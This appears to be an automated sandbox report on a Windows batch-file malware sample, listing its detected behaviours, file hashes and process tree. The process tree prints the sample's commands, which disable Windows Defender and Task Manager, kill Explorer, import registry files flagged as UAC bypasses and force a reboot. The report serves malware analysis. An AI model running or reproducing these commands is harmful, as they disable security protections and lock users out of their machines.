Analysis

  • max time kernel
    118s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    02-03-2024 20:29

Errors

Reason
Machine shutdown

General

  • Target

    TheMalwaredev-s-garbage-main/Install Windows20/installer/main.bat

  • Size

    3KB

  • MD5

    5f54a2c61397eb3d4f1bc8e9736fec2a

  • SHA1

    5c3ad25b0bff96ad74d2743b15089847d6be2d40

  • SHA256

    9995fab89f303652abc14b153ea864d9a5e39e20c8077d165e9944948eeeb968

  • SHA512

    d7c84ac92cb35aca9fb4c2e7bb43924e5033ad49a9b4fcee320386a5d0bfddf2ec674e33a575c0848b9d274bebeb4dc9abca0360493c968bbc29c7a09438141f

Malware Config

Signatures

  • UAC bypass 3 TTPs 16 IoCs
  • Disables Task Manager via registry modification
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 19 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\main.bat"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1840
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\update.vbs"
      2⤵
      PID:2496
    • C:\Windows\system32\timeout.exe
      timeout 20
      2⤵
      • Delays execution with timeout.exe
      PID:2472
    • C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Public\temp\noescape.bmp /f
      2⤵
      • Sets desktop wallpaper using registry
      PID:2248
    • C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      2⤵
      PID:2956
    • C:\Windows\system32\reg.exe
      Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      PID:2236
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoTrayItemsDisplay" /t REG_DWORD /d "1" /f
      2⤵
      PID:1804
    • C:\Windows\system32\reg.exe
      reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
      2⤵
      • Modifies registry key
      PID:2016
    • C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoPinningToTaskbar" /t REG_DWORD /d "1" /f
      2⤵
      PID:1796
    • C:\Windows\system32\reg.exe
      reg import virus.reg
      2⤵
      PID:2720
    • C:\Windows\system32\reg.exe
      reg import here.reg
      2⤵
      • UAC bypass
      PID:2780
    • C:\Windows\system32\reg.exe
      reg import death.reg
      2⤵
      PID:2640
    • C:\Windows\system32\reg.exe
      reg import no.reg
      2⤵
      • UAC bypass
      PID:2804
    • C:\Windows\system32\reg.exe
      reg import password.reg
      2⤵
      PID:2824
    • C:\Windows\system32\reg.exe
      reg import color.reg
      2⤵
      PID:2820
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:348
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:1596
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:588
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:2304
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\mover.exe
      mover.exe
      2⤵
      PID:2880
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:2172
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:2792
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:2076
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
      2⤵
      PID:2800
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
      x.exe
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2484
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\F6CD.tmp\x.cmd""
        3⤵
        PID:684
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
      x.exe
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2488
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\F68F.tmp\x.cmd""
        3⤵
        PID:2920
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
      x.exe
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2628
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\F6AE.tmp\x.cmd""
        3⤵
        PID:1040
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
      x.exe
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2572
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\F6AF.tmp\x.cmd""
        3⤵
        PID:704
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
      x.exe
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2732
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\F69E.tmp\x.cmd""
        3⤵
        PID:1936
    • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
      x.exe
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2656
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\F6B0.tmp\x.cmd""
        3⤵
        PID:1756
    • C:\Windows\system32\reg.exe
      reg import im.reg
      2⤵
      PID:3028
    • C:\Windows\system32\reg.exe
      reg import systemmessage.reg
      2⤵
      • UAC bypass
      PID:1368
    • C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      • Modifies registry key
      PID:1944
    • C:\Windows\system32\reg.exe
      reg import UAC.reg
      2⤵
      • UAC bypass
      PID:2008
    • C:\Windows\system32\reg.exe
      reg import inkfile.reg
      2⤵
      • Modifies registry class
      PID:2024
    • C:\Windows\system32\shutdown.exe
      shutdown /r /t 0
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1796
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    1⤵
    PID:2824
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x1
    1⤵
    PID:2296

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\note.txt
    Filesize
      385B
    MD5
      1ebb3ddb5424eae8205a111a3b4e2237
    SHA1
      7f6603ae0410ea2dc5adfd879632039b0eee955a
    SHA256
      efc4f3065ab66661a92daebbf770103b2e8306d3985ac5c5ae816e0f64e6ab4e
    SHA512
      cc9d3d208f97f8f9f46865ce75257cff6616e49f49b90e1273fa923c1d7c05c68e0ea35eec3361de4167839acec86e03c40cf4f1bf7bb039ec91cd4f8e3c855f

  • C:\Users\Admin\AppData\Local\Temp\F68F.tmp\x.cmd
    Filesize
      76B
    MD5
      5156c0df260ccc7bc13b73b6de4d9a25
    SHA1
      e6f8b1f6ef658a1f5772b83c898088330184d291
    SHA256
      565850ac8c04867b561958ea678143b383499e729aebace9c84bec0484772b88
    SHA512
      d2e7d791e6ccbf6389659d4fa673bbbb837a8ccbdfec287ff6a5d8a385e9aad413d692bc5cf93cae4d8292f565a7e9ddcc437da97a9b5fdd0c4526c4ca69cc39

  • C:\Users\Public\Desktop\Escape.vbs
    Filesize
      23B
    MD5
      23873c064655ec26585bb489cab1965c
    SHA1
      575d47d57ddb6ffb5335f5d48f6bd222e17af599
    SHA256
      828653c66fd126cb9f30a8fc566887d3ae54376ccba637101ae8e0889a6a3b63
    SHA512
      44517e1b3e6ba403d99e3ae6d9340ea3e856a50e4bec3740d3530d066f28677b78ea2a25ebf63df948469dde04547044483bb9d37a5cf79e8b3ea3544bfaf348

  • C:\Users\Public\Desktop\Hacking2.vbs
    Filesize
      182B
    MD5
      81c5f570e4fb185d0d675c450741f28b
    SHA1
      cc7c042a8ec903ea5fd4171ffa2dfe57e8a5586a
    SHA256
      0c32196e293badc8b917f22ecf9d746c631678a15704dc829d594e1e04f01376
    SHA512
      2434226097e83942ddade8a98efaa2d912f8030180729fd6ccedbe70091d262a8d1ac080ae41a6c5ac37c4303c79bbdea8d6fa86828759651536532cb2fa5936

  • C:\Users\Public\Desktop\setup3.exe
    Filesize
      22KB
    MD5
      9d0cbe0006b8e6760679bf893c5d848f
    SHA1
      a85c9378a962f1f3454ec34ce596dea318031618
    SHA256
      41bb8333a815138ccdc1809c33d3263d67834b2493c6b8eeebd5dde3d1ffe20c
    SHA512
      13f513d75235da33bb032901b506c718cece2f7f9d0fbe4bd9d3508f9efca208b10a319b130ec98327b6c5e054abcf7d052ce3e672f2c1c38bac1c162d4358e2

  • C:\Users\Public\Music\FREE SOLARIS.vbs
    Filesize
      37B
    MD5
      ac910281f16a464b6257102b715ffafc
    SHA1
      590add7ed48a1d5fa78093812ef88f9d0dfbb7c5
    SHA256
      afb4e7e0f799d76ec4b197427b0933935eddd933baf6379875b3c37eb6b1bc6e
    SHA512
      a62b9363acf0628ec373a33409f13e161779f0d28b0dd163b53d4ec9135b172e68c10dfb37a5459e51ec636ff3e23cc17de4a846d273e5a3e9149abe41a806ad

  • C:\WinKernel64.bat
    Filesize
      113B
    MD5
      284e7e79635ec15370bb7530d20f6b7e
    SHA1
      471f6b7bc91a8c6b51f291c75126a38b082a92ce
    SHA256
      4d81298082414e092ccb0dab56007df80a1930b60315a5b759bf1d10d8c11235
    SHA512
      3bcbce046df39bf285a2e63f83374fc0c6b809b4ee5091744496244b5929753f102402c87671205ae9b7caa78b12328cabfae1523fe6abbc5abd6e66cae57e24

  • C:\Windows\updatepush.exe
    Filesize
      128KB
    MD5
      27d4d788b5190d8ad943f03479c86360
    SHA1
      5ca05ed08987ade8d20a9e1bd3d7245d9b3ef4e7
    SHA256
      2d3586f1ce37337292ac4b3ece03ab78b3aa5c28a5925d7d498d35ca32434993
    SHA512
      c55a8819dc3285d655c2033e98e47db6397654ad1aee6a22e8ac50d8b6cb11b8eb41a59a6aee5bce1a784167894f4664b0ad390110e94013a19d221a9cfba02e

  • memory/2000-174-0x0000000140000000-0x0000000140126000-memory.dmp
    Filesize
      1.1MB

  • memory/2296-345-0x0000000002BB0000-0x0000000002BB1000-memory.dmp
    Filesize
      4KB

  • memory/2484-337-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize
      64KB

  • memory/2484-275-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize
      64KB

  • memory/2488-341-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize
      64KB

  • memory/2572-339-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize
      64KB

  • memory/2628-340-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize
      64KB

  • memory/2656-338-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize
      64KB

  • memory/2732-342-0x0000000000400000-0x0000000000410000-memory.dmp
    Filesize
      64KB

  • memory/2824-343-0x0000000002D90000-0x0000000002D91000-memory.dmp
    Filesize
      4KB

  • memory/2880-178-0x0000000140000000-0x0000000140126000-memory.dmp
    Filesize
      1.1MB

  • memory/2880-344-0x0000000140000000-0x0000000140126000-memory.dmp
    Filesize
      1.1MB

  • memory/2880-176-0x0000000140000000-0x0000000140126000-memory.dmp
    Filesize
      1.1MB